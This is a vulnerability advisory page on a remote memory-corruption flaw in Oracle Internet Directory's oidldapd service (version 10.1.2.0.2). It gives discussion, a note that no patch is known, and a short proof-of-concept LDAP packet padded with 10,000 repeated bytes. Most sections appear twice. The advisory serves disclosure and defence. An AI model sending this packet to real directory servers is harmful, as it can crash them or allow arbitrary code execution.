Oracle Internet Directory 'oidldapd' Remote Memory Corruption Vulnerability
BID:37833
Info
Oracle Internet Directory 'oidldapd' Remote Memory Corruption Vulnerability
| Bugtraq ID: | 37833 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 10 2006 12:00AM |
| Updated: | Jan 18 2010 06:51PM |
| Credit: | Intevydis |
| Vulnerable: |
Oracle Internet Directory 10.1.2.0.2 |
| Not Vulnerable: | |
Discussion
Oracle Internet Directory 'oidldapd' Remote Memory Corruption Vulnerability
Oracle Internet Directory is prone to a remote memory-corruption vulnerability.
Exploits may allow attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.
Oracle Internet Directory 10.1.2.0.2 is vulnerable; other versions may also be affected.
NOTE: This issue may be a duplicate of an existing BID and may have already been addressed by the vendor. We will update the BID if more information emerges.
Oracle Internet Directory is prone to a remote memory-corruption vulnerability.
Exploits may allow attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.
Oracle Internet Directory 10.1.2.0.2 is vulnerable; other versions may also be affected.
NOTE: This issue may be a duplicate of an existing BID and may have already been addressed by the vendor. We will update the BID if more information emerges.
Exploit / POC
Oracle Internet Directory 'oidldapd' Remote Memory Corruption Vulnerability
The following proof-of-concept packet is available:
s ="\x30\x82\x27\x4a\x02\x01\x01\x63\x82\x27\x43\x04\x00\x0a\x01\x02"
s+="\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa4\x82\x27\x2e"
s+="\x04\x04\x6d\x61\x69\x6c\x30\x82\x27\x24\x80\x04\x66\x6f\x6f\x40"
s+="\x81\x04\x75\x6e\x69\x76"
s+="\x82"*10000
s+="\x82\x06\x6d\x75\x6e\x69\x63\x68"
The following proof-of-concept packet is available:
s ="\x30\x82\x27\x4a\x02\x01\x01\x63\x82\x27\x43\x04\x00\x0a\x01\x02"
s+="\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa4\x82\x27\x2e"
s+="\x04\x04\x6d\x61\x69\x6c\x30\x82\x27\x24\x80\x04\x66\x6f\x6f\x40"
s+="\x81\x04\x75\x6e\x69\x76"
s+="\x82"*10000
s+="\x82\x06\x6d\x75\x6e\x69\x63\x68"
Solution / Fix
Oracle Internet Directory 'oidldapd' Remote Memory Corruption Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Oracle Internet Directory 'oidldapd' Remote Memory Corruption Vulnerability
References:
References:
- Oracle Internet Directory (Oracle)
- Oracle Internet Directory heap corruption (Intevydis)